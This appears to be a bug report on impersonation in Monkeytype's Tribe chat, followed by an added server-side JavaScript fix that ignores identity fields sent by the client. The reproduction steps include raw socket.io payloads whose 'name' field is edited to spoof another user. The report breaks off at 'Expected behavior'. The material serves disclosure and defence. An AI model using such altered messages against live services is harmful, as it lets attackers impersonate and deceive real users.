Describe the bug: The Tribe Chat is vulnerable to Authentication Bypass by Spoofing allowing any user to send messages that appear to come from other users. Malicious users can abuse current socket message authentication measures to spoof other users in the chat room by modifying raw socket.io messages.
Tribe.Chat.Impersonation.PoC.mp4
To Reproduce
- Go to a tribe chat room, ex: https://dev.monkeytype.com/tribe_1d849e
- Send a message, capturing the socket.io message.
42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"alice"}}]
- Modify the name parameter, and re-send
42["mp_chat_message",{"isSystem":false,"isLeader":true,"message":"Hey this is still alice","from":{"id":"UocD_4qRZiXGbXf8AA-n","name":"bob"}}]
Expected behavior After sending the socket
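One server-side way to close the gap described in this report, as an added example that is not part of the original report and is not Monkeytype's code: the handler rebuilds `from`, `isLeader` and `isSystem` from state the server holds for the connection and ignores the client's copies. `sessions`, `rooms`, `handleChatMessage`, the length limit and bob's socket id are hypothetical, and the sample data is constructed.

```javascript
// Added example (hypothetical names): never trust identity fields in the payload.
// Server-held state keyed by the socket id the server assigned (constructed data).
const sessions = new Map([
  ["UocD_4qRZiXGbXf8AA-n", { name: "alice", room: "tribe_1d849e" }],
  ["constructed-bob-socket-id", { name: "bob", room: "tribe_1d849e" }],
]);
const rooms = new Map([["tribe_1d849e", { leaderId: "UocD_4qRZiXGbXf8AA-n" }]]);
const MAX_MESSAGE_LENGTH = 512; // assumed limit, not from the report

// socketId comes from the connection object on the server, not from the message.
function handleChatMessage(socketId, payload) {
  const session = sessions.get(socketId);
  if (!session) return { ok: false, reason: "unknown socket" };
  if (!payload || typeof payload.message !== "string") {
    return { ok: false, reason: "bad message" };
  }
  const message = payload.message.trim().slice(0, MAX_MESSAGE_LENGTH);
  if (message === "") return { ok: false, reason: "empty message" };

  const room = rooms.get(session.room);
  const isLeader = room !== undefined && room.leaderId === socketId;

  // Detection: the client claimed an identity or role the server does not hold.
  const claimed = payload.from || {};
  const spoofAttempt =
    (claimed.id !== undefined && claimed.id !== socketId) ||
    (claimed.name !== undefined && claimed.name !== session.name) ||
    payload.isSystem === true ||
    (payload.isLeader === true && !isLeader);

  // Only `message` is taken from the client; everything else is server-derived.
  return {
    ok: true,
    spoofAttempt,
    broadcast: {
      isSystem: false,
      isLeader,
      message,
      from: { id: socketId, name: session.name },
    },
  };
}
```

In a socket.io handler the first argument would be `socket.id` and `broadcast` is what gets emitted to the room; `spoofAttempt` is a signal worth logging.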